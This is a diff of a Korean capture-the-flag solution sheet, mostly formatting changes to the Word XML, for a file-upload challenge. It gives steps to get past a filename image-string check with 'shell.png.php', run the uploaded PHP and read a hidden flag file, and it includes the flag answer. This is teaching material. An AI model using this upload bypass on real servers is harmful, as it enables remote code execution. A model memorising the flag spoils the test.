       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>분류/난이도</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>분류 / 난이도</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>File Upload / 고급</w:t>
             </w:r>
           </w:p>
@@ -2641,21 +4170,41 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>전과</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>450</w:t>
             </w:r>
           </w:p>
@@ -2664,27 +4213,60 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
-            <w:shd w:fill="EAF2F8"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="E8EEDF"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>목표</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>FLAG</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4320"/>
+            <w:tcW w:type="dxa" w:w="4896"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>파일명 확장자 검사를 우회해 실행 가능한 PHP 첨부를 업로드하고 숨겨진 파일을 읽는다.</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>FLAG{dispatch_upload_php_execution}</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>목표</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>이미지 문자열 검사를 우회해 PHP 파일을 업로드하고 숨은 파일을 읽는다.</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
@@ -2696,33 +4278,37 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>업로드 로직이 파일명에 .png/.jpg/.jpeg 문자열 포함 여부만 확인하는지 확인한다.</w:t>
+        <w:t>파일명에 .png를 포함하되 마지막 확장자는 .php로 둔다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>실제 마지막 확장자는 .php로 유지하고 중간에 .png를 넣은 파일명을 만든다.</w:t>
+        <w:t>업로드 후 공개 경로로 접근해 PHP 실행 여부를 확인한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>업로드된 공개 경로로 접속해 PHP가 실행되는지 확인한다.</w:t>
+        <w:t>업로드 디렉터리의 .dispatch_flag를 읽는다.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>업로드 디렉터리의 .dispatch_flag 파일을 읽는다.</w:t>
+        <w:t>출력된 FLAG를 제출한다.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2730,17 +4316,18 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>핵심 페이로드</w:t>
+        <w:t>핵심 입력</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
+        <w:spacing w:before="80" w:after="200" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="216"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
+          <w:color w:val="212D18"/>
           <w:sz w:val="18"/>
         </w:rPr>
         <w:t>파일명: shell.png.php</w:t>
@@ -2753,30 +4340,17 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>정답</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:ind w:left="288"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Malgun Gothic"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>FLAG{dispatch_upload_php_execution}</w:t>
+        <w:t>핵심 포인트</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>메모: 파일명 문자열 검사와 웹 서버의 실제 실행 판단이 다르면 업로드 우회가 가능하다.</w:t>
+        <w:t>파일명 문자열 검사와 웹 서버 실행 판단이 다르면 업로드 우회가 가능하다.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
-      <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/>
+      <w:pgMar w:top="1080" w:right="1224" w:bottom="1080" w:left="1224" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
       <w:docGrid w:linePitch="360"/>
     </w:sectPr>
@@ -3147,9 +4721,12 @@
     <w:name w:val="Normal"/>
     <w:qFormat/>
     <w:rsid w:val="00FC693F"/>
+    <w:pPr>
+      <w:spacing w:line="300" w:lineRule="auto" w:after="140"/>
+    </w:pPr>
     <w:rPr>
       <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
-      <w:sz w:val="20"/>
+      <w:sz w:val="21"/>
     </w:rPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Header">
@@ -3207,7 +4784,7 @@
     <w:pPr>
       <w:keepNext/>
       <w:keepLines/>
-      <w:spacing w:before="480" w:after="0"/>
+      <w:spacing w:before="200" w:after="200"/>
       <w:outlineLvl w:val="0"/>
     </w:pPr>
     <w:rPr>
@@ -3215,7 +4792,7 @@
       <w:b/>
       <w:bCs/>
       <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
-      <w:sz w:val="28"/>
+      <w:sz w:val="36"/>
       <w:szCs w:val="28"/>
     </w:rPr>
   </w:style>
@@ -3231,7 +4808,7 @@
     <w:pPr>
       <w:keepNext/>
       <w:keepLines/>
-      <w:spacing w:before="200" w:after="0"/>
+      <w:spacing w:before="200" w:after="120"/>
       <w:outlineLvl w:val="1"/>
     </w:pPr>
     <w:rPr>

</xml_diff>